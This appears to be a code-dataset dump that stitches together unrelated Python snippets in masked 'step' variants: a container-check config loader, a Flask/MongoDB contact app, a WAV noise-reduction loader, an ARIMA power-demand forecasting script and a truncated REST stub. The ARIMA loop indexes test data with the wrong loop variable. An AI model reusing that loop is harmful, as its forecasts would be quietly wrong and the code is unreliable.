os.path.join(get_checks_path(), group, name + '.py')\n\n @staticmethod\n def get_check_files(group, names, severity):\n \"\"\"\n Get the check files from given group with given names.\n\n :param severity: str\n :param group: str\n :param names: list of str\n :return: list of str (paths)\n \"\"\"\n check_files = []\n for f in names:\n check_file = Config.get_check_file(group=group, name=f)\n check_files.append((severity, check_file))\n return check_files\n\n def _get_check_groups(self, group=None):\n \"\"\"\n Get check group to validate\n\n :param group: str (if None, all from the config will be used)\n :return: list of str (group names)\n \"\"\"\n groups = [g for g in self.config_dict]\n if group:\n if group in groups:\n check_groups = [group]\n else:\n check_groups = []\n else:\n check_groups = groups\n return check_groups\n\n def _get_check_files(self, group=None, severity=None):\n \"\"\"\n Get file names with checks filtered by group and severity.\n\n :param group: str (if None, all groups will be used)\n :param severity: str (if None, all severities will be used)\n :return: list of str (absolute paths)\n \"\"\"\n groups = {}\n for g in self._get_check_groups(group):\n check_files = []\n for sev, files in iteritems(self.config_dict[g]):\n if not severity or severity == sev:\n check_files += Config.get_check_files(group=g, names=\n files, severity=sev)\n groups[g] = check_files\n return groups\n\n\ndef get_checks_path():\n \"\"\"\n Get path to checks.\n\n :return: str (absolute path of directory with checks)\n \"\"\"\n rel_path = os.path.join(os.pardir, os.pardir, os.pardir, 'checks')\n return os.path.abspath(os.path.join(__file__, rel_path))\n\n\n<mask token>\n",
"step-4": "<mask token>\n\n\nclass Config(object):\n\n def __init__(self, name=None):\n \"\"\"\n Load config for colin.\n\n :param name: str (name of the config file (without .json), default is \"default\"\n \"\"\"\n self.name = name or 'default'\n config_path = os.path.join(get_config_directory(), self.name + JSON)\n try:\n with open(config_path, mode='r') as config_file:\n self.config_dict = json.load(config_file)\n except Exception as ex:\n raise ColinConfigException(\"Config file '{}' cannot be loaded.\"\n .format(config_path))\n\n def get_checks(self, target_type, group=None, severity=None, tags=None):\n \"\"\"\n Get all checks for given type/group/severity/tags.\n\n :param target_type: TargetType enum\n :param group: str (if not group, get checks from all groups/directories)\n :param severity: str (optional x required)\n :param tags: list of str\n :return: list of check instances\n \"\"\"\n check_files = self._get_check_files(group=group, severity=severity)\n groups = {}\n for group, check_files in iteritems(check_files):\n checks = []\n for severity, check_file in check_files:\n check_classes = load_check_implementation(path=check_file,\n severity=severity)\n for check_class in check_classes:\n if is_compatible(target_type, check_class, severity, tags):\n checks.append(check_class)\n groups[group] = checks\n return groups\n\n @staticmethod\n def get_check_file(group, name):\n \"\"\"\n Get the check file from given group with given name.\n\n :param group: str\n :param name: str\n :return: str (path)\n \"\"\"\n return os.path.join(get_checks_path(), group, name + '.py')\n\n @staticmethod\n def get_check_files(group, names, severity):\n \"\"\"\n Get the check files from given group with given names.\n\n :param severity: str\n :param group: str\n :param names: list of str\n :return: list of str (paths)\n \"\"\"\n check_files = []\n for f in names:\n check_file = Config.get_check_file(group=group, name=f)\n check_files.append((severity, check_file))\n return check_files\n\n def _get_check_groups(self, group=None):\n \"\"\"\n Get check group to validate\n\n :param group: str (if None, all from the config will be used)\n :return: list of str (group names)\n \"\"\"\n groups = [g for g in self.config_dict]\n if group:\n if group in groups:\n check_groups = [group]\n else:\n check_groups = []\n else:\n check_groups = groups\n return check_groups\n\n def _get_check_files(self, group=None, severity=None):\n \"\"\"\n Get file names with checks filtered by group and severity.\n\n :param group: str (if None, all groups will be used)\n :param severity: str (if None, all severities will be used)\n :return: list of str (absolute paths)\n \"\"\"\n groups = {}\n for g in self._get_check_groups(group):\n check_files = []\n for sev, files in iteritems(self.config_dict[g]):\n if not severity or severity == sev:\n check_files += Config.get_check_files(group=g, names=\n files, severity=sev)\n groups[g] = check_files\n return groups\n\n\ndef get_checks_path():\n \"\"\"\n Get path to checks.\n\n :return: str (absolute path of directory with checks)\n \"\"\"\n rel_path = os.path.join(os.pardir, os.pardir, os.pardir, 'checks')\n return os.path.abspath(os.path.join(__file__, rel_path))\n\n\ndef get_config_directory():\n \"\"\"\n Get the directory with config files\n\n :return: str\n \"\"\"\n local_share = os.path.join(os.path.expanduser('~'), '.local',\n CONFIG_DIRECTORY)\n if os.path.isdir(local_share) and os.path.exists(local_share):\n return local_share\n usr_local_share = os.path.join('/usr/local', CONFIG_DIRECTORY)\n if os.path.isdir(usr_local_share) and os.path.exists(usr_local_share):\n return usr_local_share\n raise ColinConfigException('Config directory cannot be found.')\n",
"step-5": "import json\nimport os\n\nfrom six import iteritems\n\nfrom ..exceptions import ColinConfigException\nfrom ..constant import CONFIG_DIRECTORY, JSON\nfrom ..loader import load_check_implementation\nfrom ..target import is_compatible\n\n\nclass Config(object):\n\n def __init__(self, name=None):\n \"\"\"\n Load config for colin.\n\n :param name: str (name of the config file (without .json), default is \"default\"\n \"\"\"\n self.name = name or \"default\"\n config_path = os.path.join(get_config_directory(), self.name + JSON)\n try:\n with open(config_path, mode='r') as config_file:\n self.config_dict = json.load(config_file)\n except Exception as ex:\n raise ColinConfigException(\"Config file '{}' cannot be loaded.\".format(config_path))\n\n def get_checks(self, target_type, group=None, severity=None, tags=None):\n \"\"\"\n Get all checks for given type/group/severity/tags.\n\n :param target_type: TargetType enum\n :param group: str (if not group, get checks from all groups/directories)\n :param severity: str (optional x required)\n :param tags: list of str\n :return: list of check instances\n \"\"\"\n check_files = self._get_check_files(group=group,\n severity=severity)\n groups = {}\n for (group, check_files) in iteritems(check_files):\n checks = []\n for severity, check_file in check_files:\n\n check_classes = load_check_implementation(path=check_file, severity=severity)\n for check_class in check_classes:\n if is_compatible(target_type, check_class, severity, tags):\n checks.append(check_class)\n\n groups[group] = checks\n return groups\n\n @staticmethod\n def get_check_file(group, name):\n \"\"\"\n Get the check file from given group with given name.\n\n :param group: str\n :param name: str\n :return: str (path)\n \"\"\"\n return os.path.join(get_checks_path(), group, name + \".py\")\n\n @staticmethod\n def get_check_files(group, names, severity):\n \"\"\"\n Get the check files from given group with given names.\n\n :param severity: str\n :param group: str\n :param names: list of str\n :return: list of str (paths)\n \"\"\"\n check_files = []\n for f in names:\n check_file = Config.get_check_file(group=group,\n name=f)\n check_files.append((severity, check_file))\n return check_files\n\n def _get_check_groups(self, group=None):\n \"\"\"\n Get check group to validate\n\n :param group: str (if None, all from the config will be used)\n :return: list of str (group names)\n \"\"\"\n groups = [g for g in self.config_dict]\n if group:\n if group in groups:\n check_groups = [group]\n else:\n check_groups = []\n else:\n check_groups = groups\n return check_groups\n\n def _get_check_files(self, group=None, severity=None):\n \"\"\"\n Get file names with checks filtered by group and severity.\n\n :param group: str (if None, all groups will be used)\n :param severity: str (if None, all severities will be used)\n :return: list of str (absolute paths)\n \"\"\"\n groups = {}\n for g in self._get_check_groups(group):\n check_files = []\n for sev, files in iteritems(self.config_dict[g]):\n if (not severity) or severity == sev:\n check_files += Config.get_check_files(group=g,\n names=files,\n severity=sev)\n groups[g] = check_files\n return groups\n\n\ndef get_checks_path():\n \"\"\"\n Get path to checks.\n\n :return: str (absolute path of directory with checks)\n \"\"\"\n rel_path = os.path.join(os.pardir, os.pardir, os.pardir, \"checks\")\n return os.path.abspath(os.path.join(__file__, rel_path))\n\n\ndef get_config_directory():\n \"\"\"\n Get the directory with config files\n\n :return: str\n \"\"\"\n local_share = os.path.join(os.path.expanduser(\"~\"),\n \".local\",\n CONFIG_DIRECTORY)\n if os.path.isdir(local_share) and os.path.exists(local_share):\n return local_share\n\n usr_local_share = os.path.join(\"/usr/local\", CONFIG_DIRECTORY)\n if os.path.isdir(usr_local_share) and os.path.exists(usr_local_share):\n return usr_local_share\n\n raise ColinConfigException(\"Config directory cannot be found.\")\n",
"step-ids": [
6,
7,
8,
9,
11
]
}
|
[
6,
7,
8,
9,
11
] |
from flask import Flask, render_template, request, url_for, redirect,jsonify,json,request
from pymongo import MongoClient
#conexão bd
app = Flask(__name__)
conexao = MongoClient('localhost',27017)
db = conexao['teste_db']
#inserindo contatos iniciais
contato1 = {'nome': 'Lucas', 'email': '[email protected]', 'telefone': '11 99389-3244'}
contato2 = {'nome': 'Lara', 'email': '[email protected]', 'telefone': '11 99333-3556'}
catalogo = db.catalogo
catalogo.insert_one(contato1)
catalogo.insert_one(contato2)
#página inicial
@app.route('/')
def showMachineList():
return render_template('list.html')
@app.route("/insert_records", methods=['POST'])
def insert_records():
json_data = request.json['info']
nome = json_data['nome']
email = json_data['email']
telefone = json_data['telefone']
db.catalogo.insert_one({
'nome':nome,'email':email,'telefone':telefone
})
return jsonify(status='OK',message='inserted successfully')
@app.route('/get_records',methods=['POST'])
def get_records():
contatos = db.catalogo.find()
return render_template('list.html',contatos=contatos)
if __name__ == "__main__":
app.run(debug=True)
|
normal
|
{
"blob_id": "05ca16303d0eb962249793164ac91795c45cc3c2",
"index": 9974,
"step-1": "<mask token>\n\n\[email protected]('/')\ndef showMachineList():\n return render_template('list.html')\n\n\[email protected]('/insert_records', methods=['POST'])\ndef insert_records():\n json_data = request.json['info']\n nome = json_data['nome']\n email = json_data['email']\n telefone = json_data['telefone']\n db.catalogo.insert_one({'nome': nome, 'email': email, 'telefone': telefone}\n )\n return jsonify(status='OK', message='inserted successfully')\n\n\[email protected]('/get_records', methods=['POST'])\ndef get_records():\n contatos = db.catalogo.find()\n return render_template('list.html', contatos=contatos)\n\n\n<mask token>\n",
"step-2": "<mask token>\ncatalogo.insert_one(contato1)\ncatalogo.insert_one(contato2)\n\n\[email protected]('/')\ndef showMachineList():\n return render_template('list.html')\n\n\[email protected]('/insert_records', methods=['POST'])\ndef insert_records():\n json_data = request.json['info']\n nome = json_data['nome']\n email = json_data['email']\n telefone = json_data['telefone']\n db.catalogo.insert_one({'nome': nome, 'email': email, 'telefone': telefone}\n )\n return jsonify(status='OK', message='inserted successfully')\n\n\[email protected]('/get_records', methods=['POST'])\ndef get_records():\n contatos = db.catalogo.find()\n return render_template('list.html', contatos=contatos)\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n",
"step-3": "<mask token>\napp = Flask(__name__)\nconexao = MongoClient('localhost', 27017)\ndb = conexao['teste_db']\ncontato1 = {'nome': 'Lucas', 'email': '[email protected]', 'telefone':\n '11 99389-3244'}\ncontato2 = {'nome': 'Lara', 'email': '[email protected]', 'telefone':\n '11 99333-3556'}\ncatalogo = db.catalogo\ncatalogo.insert_one(contato1)\ncatalogo.insert_one(contato2)\n\n\[email protected]('/')\ndef showMachineList():\n return render_template('list.html')\n\n\[email protected]('/insert_records', methods=['POST'])\ndef insert_records():\n json_data = request.json['info']\n nome = json_data['nome']\n email = json_data['email']\n telefone = json_data['telefone']\n db.catalogo.insert_one({'nome': nome, 'email': email, 'telefone': telefone}\n )\n return jsonify(status='OK', message='inserted successfully')\n\n\[email protected]('/get_records', methods=['POST'])\ndef get_records():\n contatos = db.catalogo.find()\n return render_template('list.html', contatos=contatos)\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n",
"step-4": "from flask import Flask, render_template, request, url_for, redirect, jsonify, json, request\nfrom pymongo import MongoClient\napp = Flask(__name__)\nconexao = MongoClient('localhost', 27017)\ndb = conexao['teste_db']\ncontato1 = {'nome': 'Lucas', 'email': '[email protected]', 'telefone':\n '11 99389-3244'}\ncontato2 = {'nome': 'Lara', 'email': '[email protected]', 'telefone':\n '11 99333-3556'}\ncatalogo = db.catalogo\ncatalogo.insert_one(contato1)\ncatalogo.insert_one(contato2)\n\n\[email protected]('/')\ndef showMachineList():\n return render_template('list.html')\n\n\[email protected]('/insert_records', methods=['POST'])\ndef insert_records():\n json_data = request.json['info']\n nome = json_data['nome']\n email = json_data['email']\n telefone = json_data['telefone']\n db.catalogo.insert_one({'nome': nome, 'email': email, 'telefone': telefone}\n )\n return jsonify(status='OK', message='inserted successfully')\n\n\[email protected]('/get_records', methods=['POST'])\ndef get_records():\n contatos = db.catalogo.find()\n return render_template('list.html', contatos=contatos)\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n",
"step-5": "from flask import Flask, render_template, request, url_for, redirect,jsonify,json,request\n\nfrom pymongo import MongoClient\n\n#conexão bd\napp = Flask(__name__)\nconexao = MongoClient('localhost',27017)\ndb = conexao['teste_db']\n\n#inserindo contatos iniciais\ncontato1 = {'nome': 'Lucas', 'email': '[email protected]', 'telefone': '11 99389-3244'}\ncontato2 = {'nome': 'Lara', 'email': '[email protected]', 'telefone': '11 99333-3556'}\ncatalogo = db.catalogo\ncatalogo.insert_one(contato1)\ncatalogo.insert_one(contato2)\n\n\n#página inicial\[email protected]('/')\ndef showMachineList():\n return render_template('list.html')\n\[email protected](\"/insert_records\", methods=['POST'])\ndef insert_records():\n \n json_data = request.json['info']\n nome = json_data['nome']\n email = json_data['email']\n telefone = json_data['telefone']\n\n db.catalogo.insert_one({\n 'nome':nome,'email':email,'telefone':telefone\n })\n \n return jsonify(status='OK',message='inserted successfully')\n\[email protected]('/get_records',methods=['POST'])\ndef get_records():\n \n contatos = db.catalogo.find() \n\n return render_template('list.html',contatos=contatos)\n\n\nif __name__ == \"__main__\":\n app.run(debug=True)",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
from scipy.io import wavfile
import numpy
from matplotlib import pyplot as plt
import librosa
import noisereduce
def loadWavFile(fileName, filePath, savePlot, maxAudioLength, reduceNoise = True):
# Read file
# rate, data = wavfile.read(filePath)
# print(filePath, rate, data.shape, "audio length", data.shape[0] / rate, data[0])
data, rate = librosa.load(filePath, sr=None)
# print(filePath, rate, data.shape, "librosa audio length", data.shape[0] / rate, data[0])
if reduceNoise:
noiseRemovedData = noisereduce.reduce_noise(audio_clip=data, noise_clip=data[0:10000], verbose=False)
noiseRemovedData = noisereduce.reduce_noise(audio_clip=noiseRemovedData, noise_clip=data[-10000:], verbose=False)
data = noiseRemovedData
maxDataLength = int(maxAudioLength * rate)
padding = []
if data.shape[0] > maxDataLength:
raise ValueError("Max audio length breached")
else:
paddingDataLength = maxDataLength - data.shape[0]
padding = [0 for i in range(paddingDataLength)]
# data is stereo sound. take left speaker only
leftSpeakerSound = data # data[:,0]
# print("leftSpeakerSound.shape", leftSpeakerSound.shape)
audioWithPadding = numpy.concatenate((leftSpeakerSound, padding))
# print("audioWithPadding.shape", audioWithPadding.shape)
if savePlot:
fig, ax = plt.subplots()
ax.plot(audioWithPadding)
fig.suptitle(fileName)
fig.savefig("./output_img/wav/" + fileName + "_wav.png")
plt.close(fig)
return audioWithPadding, rate
|
normal
|
{
"blob_id": "07ac061d7d1eaf23b6c95fbcbf6753f25e568188",
"index": 157,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef loadWavFile(fileName, filePath, savePlot, maxAudioLength, reduceNoise=True\n ):\n data, rate = librosa.load(filePath, sr=None)\n if reduceNoise:\n noiseRemovedData = noisereduce.reduce_noise(audio_clip=data,\n noise_clip=data[0:10000], verbose=False)\n noiseRemovedData = noisereduce.reduce_noise(audio_clip=\n noiseRemovedData, noise_clip=data[-10000:], verbose=False)\n data = noiseRemovedData\n maxDataLength = int(maxAudioLength * rate)\n padding = []\n if data.shape[0] > maxDataLength:\n raise ValueError('Max audio length breached')\n else:\n paddingDataLength = maxDataLength - data.shape[0]\n padding = [(0) for i in range(paddingDataLength)]\n leftSpeakerSound = data\n audioWithPadding = numpy.concatenate((leftSpeakerSound, padding))\n if savePlot:\n fig, ax = plt.subplots()\n ax.plot(audioWithPadding)\n fig.suptitle(fileName)\n fig.savefig('./output_img/wav/' + fileName + '_wav.png')\n plt.close(fig)\n return audioWithPadding, rate\n",
"step-3": "from scipy.io import wavfile\nimport numpy\nfrom matplotlib import pyplot as plt\nimport librosa\nimport noisereduce\n\n\ndef loadWavFile(fileName, filePath, savePlot, maxAudioLength, reduceNoise=True\n ):\n data, rate = librosa.load(filePath, sr=None)\n if reduceNoise:\n noiseRemovedData = noisereduce.reduce_noise(audio_clip=data,\n noise_clip=data[0:10000], verbose=False)\n noiseRemovedData = noisereduce.reduce_noise(audio_clip=\n noiseRemovedData, noise_clip=data[-10000:], verbose=False)\n data = noiseRemovedData\n maxDataLength = int(maxAudioLength * rate)\n padding = []\n if data.shape[0] > maxDataLength:\n raise ValueError('Max audio length breached')\n else:\n paddingDataLength = maxDataLength - data.shape[0]\n padding = [(0) for i in range(paddingDataLength)]\n leftSpeakerSound = data\n audioWithPadding = numpy.concatenate((leftSpeakerSound, padding))\n if savePlot:\n fig, ax = plt.subplots()\n ax.plot(audioWithPadding)\n fig.suptitle(fileName)\n fig.savefig('./output_img/wav/' + fileName + '_wav.png')\n plt.close(fig)\n return audioWithPadding, rate\n",
"step-4": "from scipy.io import wavfile\nimport numpy\nfrom matplotlib import pyplot as plt\nimport librosa\nimport noisereduce\n\ndef loadWavFile(fileName, filePath, savePlot, maxAudioLength, reduceNoise = True):\n # Read file\n # rate, data = wavfile.read(filePath)\n # print(filePath, rate, data.shape, \"audio length\", data.shape[0] / rate, data[0])\n\n data, rate = librosa.load(filePath, sr=None)\n # print(filePath, rate, data.shape, \"librosa audio length\", data.shape[0] / rate, data[0])\n if reduceNoise:\n noiseRemovedData = noisereduce.reduce_noise(audio_clip=data, noise_clip=data[0:10000], verbose=False)\n noiseRemovedData = noisereduce.reduce_noise(audio_clip=noiseRemovedData, noise_clip=data[-10000:], verbose=False)\n data = noiseRemovedData\n\n\n maxDataLength = int(maxAudioLength * rate)\n padding = []\n if data.shape[0] > maxDataLength:\n raise ValueError(\"Max audio length breached\")\n else:\n paddingDataLength = maxDataLength - data.shape[0]\n padding = [0 for i in range(paddingDataLength)]\n\n # data is stereo sound. take left speaker only\n leftSpeakerSound = data # data[:,0]\n # print(\"leftSpeakerSound.shape\", leftSpeakerSound.shape)\n\n audioWithPadding = numpy.concatenate((leftSpeakerSound, padding))\n # print(\"audioWithPadding.shape\", audioWithPadding.shape)\n\n if savePlot:\n fig, ax = plt.subplots()\n ax.plot(audioWithPadding)\n fig.suptitle(fileName)\n fig.savefig(\"./output_img/wav/\" + fileName + \"_wav.png\")\n plt.close(fig)\n\n return audioWithPadding, rate",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
from sklearn.preprocessing import RobustScaler
from statsmodels.tsa.arima.model import ARIMA
from sklearn.metrics import mean_squared_error, r2_score, mean_absolute_error
from math import sqrt
import tensorflow as tf
import pandas as pd
import numpy as np
import os
import random
# set random seed
random.seed(1)
np.random.seed(1)
tf.random.set_random_seed(1)
random_sample_save_folder_path = '../c_data_processing/b_data_sampling/sampled_data/'
for i in range(1, 6):
df = pd.read_csv( random_sample_save_folder_path + 'power_demand_sample%i.csv' %i, index_col=0)
regions = df.columns
result = pd.DataFrame(index=['rmse_test', 'r2_test', 'mae_test'])
predict = pd.DataFrame()
for region in regions:
RE_demand = pd.read_csv(random_sample_save_folder_path + 'power_demand_sample%i.csv' % i, index_col=0) # data initialization
RE_demand = RE_demand[region]
RE_demand = pd.DataFrame(RE_demand)
# train_test_split
train_test_split = int(len(RE_demand)*0.8)
train, test = RE_demand[:train_test_split], RE_demand[train_test_split:]
# data scaling
scaler = RobustScaler()
scaler = scaler.fit(RE_demand.values)
train_scaled = scaler.transform(train)
test_scaled = scaler.transform(test)
# model setting
history = [x for x in train_scaled]
test_pred = []
for j in range(len(test_scaled)):
model = ARIMA(history, order=(3,1,1)) # setting (p, d, q) guide : https://www.youtube.com/watch?v=YQF5PDDI9jo&list=LL&index=5
model_fit = model.fit()
output = model_fit.forecast()
yhat = output
test_pred.append(yhat)
obs = test_scaled[i]
history.append(obs)
test_pred = np.array(test_pred)
test_pred = scaler.inverse_transform(test_pred)
# model evalutaion
rmse = sqrt(mean_squared_error(test, test_pred))
r2 = r2_score(test, test_pred)
mae = mean_absolute_error(test, test_pred)
metrics = [rmse, r2, mae]
result['%s' %region] = metrics
performance_path = './ARIMA/performance/'
# data forecasting
forecast = model_fit.forecast(steps=24)
forecast = forecast.reshape(-1,1)
forecast = scaler.inverse_transform(forecast)
# data concatenate
test = np.array(['test']).reshape(-1, 1)
pred = np.array(['forecast']).reshape(-1, 1)
forecast = np.concatenate([test, test_pred, pred, forecast])
forecast = np.concatenate(forecast)
predict['%s' % region] = forecast
forecast_path = './ARIMA/forecast/'
if not os.path.exists(performance_path):
os.makedirs(performance_path)
result.to_csv(performance_path + 'ARIMA_sample%s_score.csv' % i)
if not os.path.exists(forecast_path):
os.makedirs(forecast_path)
predict.to_csv(forecast_path + 'ARIMA_sample%s_forecast.csv' % i)
|
normal
|
{
"blob_id": "d78ac5188cad104ee1b3e214898c41f843b6d8c0",
"index": 5185,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nrandom.seed(1)\nnp.random.seed(1)\ntf.random.set_random_seed(1)\n<mask token>\nfor i in range(1, 6):\n df = pd.read_csv(random_sample_save_folder_path + \n 'power_demand_sample%i.csv' % i, index_col=0)\n regions = df.columns\n result = pd.DataFrame(index=['rmse_test', 'r2_test', 'mae_test'])\n predict = pd.DataFrame()\n for region in regions:\n RE_demand = pd.read_csv(random_sample_save_folder_path + \n 'power_demand_sample%i.csv' % i, index_col=0)\n RE_demand = RE_demand[region]\n RE_demand = pd.DataFrame(RE_demand)\n train_test_split = int(len(RE_demand) * 0.8)\n train, test = RE_demand[:train_test_split], RE_demand[train_test_split:\n ]\n scaler = RobustScaler()\n scaler = scaler.fit(RE_demand.values)\n train_scaled = scaler.transform(train)\n test_scaled = scaler.transform(test)\n history = [x for x in train_scaled]\n test_pred = []\n for j in range(len(test_scaled)):\n model = ARIMA(history, order=(3, 1, 1))\n model_fit = model.fit()\n output = model_fit.forecast()\n yhat = output\n test_pred.append(yhat)\n obs = test_scaled[i]\n history.append(obs)\n test_pred = np.array(test_pred)\n test_pred = scaler.inverse_transform(test_pred)\n rmse = sqrt(mean_squared_error(test, test_pred))\n r2 = r2_score(test, test_pred)\n mae = mean_absolute_error(test, test_pred)\n metrics = [rmse, r2, mae]\n result['%s' % region] = metrics\n performance_path = './ARIMA/performance/'\n forecast = model_fit.forecast(steps=24)\n forecast = forecast.reshape(-1, 1)\n forecast = scaler.inverse_transform(forecast)\n test = np.array(['test']).reshape(-1, 1)\n pred = np.array(['forecast']).reshape(-1, 1)\n forecast = np.concatenate([test, test_pred, pred, forecast])\n forecast = np.concatenate(forecast)\n predict['%s' % region] = forecast\n forecast_path = './ARIMA/forecast/'\n if not os.path.exists(performance_path):\n os.makedirs(performance_path)\n result.to_csv(performance_path + 'ARIMA_sample%s_score.csv' % i)\n if not os.path.exists(forecast_path):\n os.makedirs(forecast_path)\n predict.to_csv(forecast_path + 'ARIMA_sample%s_forecast.csv' % i)\n",
"step-3": "<mask token>\nrandom.seed(1)\nnp.random.seed(1)\ntf.random.set_random_seed(1)\nrandom_sample_save_folder_path = (\n '../c_data_processing/b_data_sampling/sampled_data/')\nfor i in range(1, 6):\n df = pd.read_csv(random_sample_save_folder_path + \n 'power_demand_sample%i.csv' % i, index_col=0)\n regions = df.columns\n result = pd.DataFrame(index=['rmse_test', 'r2_test', 'mae_test'])\n predict = pd.DataFrame()\n for region in regions:\n RE_demand = pd.read_csv(random_sample_save_folder_path + \n 'power_demand_sample%i.csv' % i, index_col=0)\n RE_demand = RE_demand[region]\n RE_demand = pd.DataFrame(RE_demand)\n train_test_split = int(len(RE_demand) * 0.8)\n train, test = RE_demand[:train_test_split], RE_demand[train_test_split:\n ]\n scaler = RobustScaler()\n scaler = scaler.fit(RE_demand.values)\n train_scaled = scaler.transform(train)\n test_scaled = scaler.transform(test)\n history = [x for x in train_scaled]\n test_pred = []\n for j in range(len(test_scaled)):\n model = ARIMA(history, order=(3, 1, 1))\n model_fit = model.fit()\n output = model_fit.forecast()\n yhat = output\n test_pred.append(yhat)\n obs = test_scaled[i]\n history.append(obs)\n test_pred = np.array(test_pred)\n test_pred = scaler.inverse_transform(test_pred)\n rmse = sqrt(mean_squared_error(test, test_pred))\n r2 = r2_score(test, test_pred)\n mae = mean_absolute_error(test, test_pred)\n metrics = [rmse, r2, mae]\n result['%s' % region] = metrics\n performance_path = './ARIMA/performance/'\n forecast = model_fit.forecast(steps=24)\n forecast = forecast.reshape(-1, 1)\n forecast = scaler.inverse_transform(forecast)\n test = np.array(['test']).reshape(-1, 1)\n pred = np.array(['forecast']).reshape(-1, 1)\n forecast = np.concatenate([test, test_pred, pred, forecast])\n forecast = np.concatenate(forecast)\n predict['%s' % region] = forecast\n forecast_path = './ARIMA/forecast/'\n if not os.path.exists(performance_path):\n os.makedirs(performance_path)\n result.to_csv(performance_path + 'ARIMA_sample%s_score.csv' % i)\n if not os.path.exists(forecast_path):\n os.makedirs(forecast_path)\n predict.to_csv(forecast_path + 'ARIMA_sample%s_forecast.csv' % i)\n",
"step-4": "from sklearn.preprocessing import RobustScaler\nfrom statsmodels.tsa.arima.model import ARIMA\nfrom sklearn.metrics import mean_squared_error, r2_score, mean_absolute_error\nfrom math import sqrt\nimport tensorflow as tf\nimport pandas as pd\nimport numpy as np\nimport os\nimport random\nrandom.seed(1)\nnp.random.seed(1)\ntf.random.set_random_seed(1)\nrandom_sample_save_folder_path = (\n '../c_data_processing/b_data_sampling/sampled_data/')\nfor i in range(1, 6):\n df = pd.read_csv(random_sample_save_folder_path + \n 'power_demand_sample%i.csv' % i, index_col=0)\n regions = df.columns\n result = pd.DataFrame(index=['rmse_test', 'r2_test', 'mae_test'])\n predict = pd.DataFrame()\n for region in regions:\n RE_demand = pd.read_csv(random_sample_save_folder_path + \n 'power_demand_sample%i.csv' % i, index_col=0)\n RE_demand = RE_demand[region]\n RE_demand = pd.DataFrame(RE_demand)\n train_test_split = int(len(RE_demand) * 0.8)\n train, test = RE_demand[:train_test_split], RE_demand[train_test_split:\n ]\n scaler = RobustScaler()\n scaler = scaler.fit(RE_demand.values)\n train_scaled = scaler.transform(train)\n test_scaled = scaler.transform(test)\n history = [x for x in train_scaled]\n test_pred = []\n for j in range(len(test_scaled)):\n model = ARIMA(history, order=(3, 1, 1))\n model_fit = model.fit()\n output = model_fit.forecast()\n yhat = output\n test_pred.append(yhat)\n obs = test_scaled[i]\n history.append(obs)\n test_pred = np.array(test_pred)\n test_pred = scaler.inverse_transform(test_pred)\n rmse = sqrt(mean_squared_error(test, test_pred))\n r2 = r2_score(test, test_pred)\n mae = mean_absolute_error(test, test_pred)\n metrics = [rmse, r2, mae]\n result['%s' % region] = metrics\n performance_path = './ARIMA/performance/'\n forecast = model_fit.forecast(steps=24)\n forecast = forecast.reshape(-1, 1)\n forecast = scaler.inverse_transform(forecast)\n test = np.array(['test']).reshape(-1, 1)\n pred = np.array(['forecast']).reshape(-1, 1)\n forecast = np.concatenate([test, test_pred, pred, forecast])\n forecast = np.concatenate(forecast)\n predict['%s' % region] = forecast\n forecast_path = './ARIMA/forecast/'\n if not os.path.exists(performance_path):\n os.makedirs(performance_path)\n result.to_csv(performance_path + 'ARIMA_sample%s_score.csv' % i)\n if not os.path.exists(forecast_path):\n os.makedirs(forecast_path)\n predict.to_csv(forecast_path + 'ARIMA_sample%s_forecast.csv' % i)\n",
"step-5": "from sklearn.preprocessing import RobustScaler\nfrom statsmodels.tsa.arima.model import ARIMA\nfrom sklearn.metrics import mean_squared_error, r2_score, mean_absolute_error\nfrom math import sqrt\n\nimport tensorflow as tf\nimport pandas as pd\nimport numpy as np\nimport os\nimport random\n\n# set random seed\nrandom.seed(1)\nnp.random.seed(1)\ntf.random.set_random_seed(1)\n\nrandom_sample_save_folder_path = '../c_data_processing/b_data_sampling/sampled_data/'\nfor i in range(1, 6):\n df = pd.read_csv( random_sample_save_folder_path + 'power_demand_sample%i.csv' %i, index_col=0)\n regions = df.columns\n\n result = pd.DataFrame(index=['rmse_test', 'r2_test', 'mae_test'])\n predict = pd.DataFrame()\n\n for region in regions:\n RE_demand = pd.read_csv(random_sample_save_folder_path + 'power_demand_sample%i.csv' % i, index_col=0) # data initialization\n RE_demand = RE_demand[region]\n RE_demand = pd.DataFrame(RE_demand)\n\n\n # train_test_split\n train_test_split = int(len(RE_demand)*0.8)\n train, test = RE_demand[:train_test_split], RE_demand[train_test_split:]\n\n # data scaling\n scaler = RobustScaler()\n scaler = scaler.fit(RE_demand.values)\n\n train_scaled = scaler.transform(train)\n test_scaled = scaler.transform(test)\n\n\n # model setting\n history = [x for x in train_scaled]\n\n test_pred = []\n\n for j in range(len(test_scaled)):\n model = ARIMA(history, order=(3,1,1)) # setting (p, d, q) guide : https://www.youtube.com/watch?v=YQF5PDDI9jo&list=LL&index=5\n model_fit = model.fit()\n output = model_fit.forecast()\n yhat = output\n test_pred.append(yhat)\n obs = test_scaled[i]\n history.append(obs)\n test_pred = np.array(test_pred)\n test_pred = scaler.inverse_transform(test_pred)\n\n # model evalutaion\n rmse = sqrt(mean_squared_error(test, test_pred))\n r2 = r2_score(test, test_pred)\n mae = mean_absolute_error(test, test_pred)\n\n metrics = [rmse, r2, mae]\n result['%s' %region] = metrics\n performance_path = './ARIMA/performance/'\n\n\n # data forecasting\n forecast = model_fit.forecast(steps=24)\n forecast = forecast.reshape(-1,1)\n forecast = scaler.inverse_transform(forecast)\n\n\n # data concatenate\n test = np.array(['test']).reshape(-1, 1)\n pred = np.array(['forecast']).reshape(-1, 1)\n\n forecast = np.concatenate([test, test_pred, pred, forecast])\n forecast = np.concatenate(forecast)\n predict['%s' % region] = forecast\n\n forecast_path = './ARIMA/forecast/'\n\n\n if not os.path.exists(performance_path):\n os.makedirs(performance_path)\n result.to_csv(performance_path + 'ARIMA_sample%s_score.csv' % i)\n\n if not os.path.exists(forecast_path):\n os.makedirs(forecast_path)\n predict.to_csv(forecast_path + 'ARIMA_sample%s_forecast.csv' % i)",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
from flask_restful import Api, Resource, reqparse
class HelloApiHandler(Resource):
def get(self):
return {
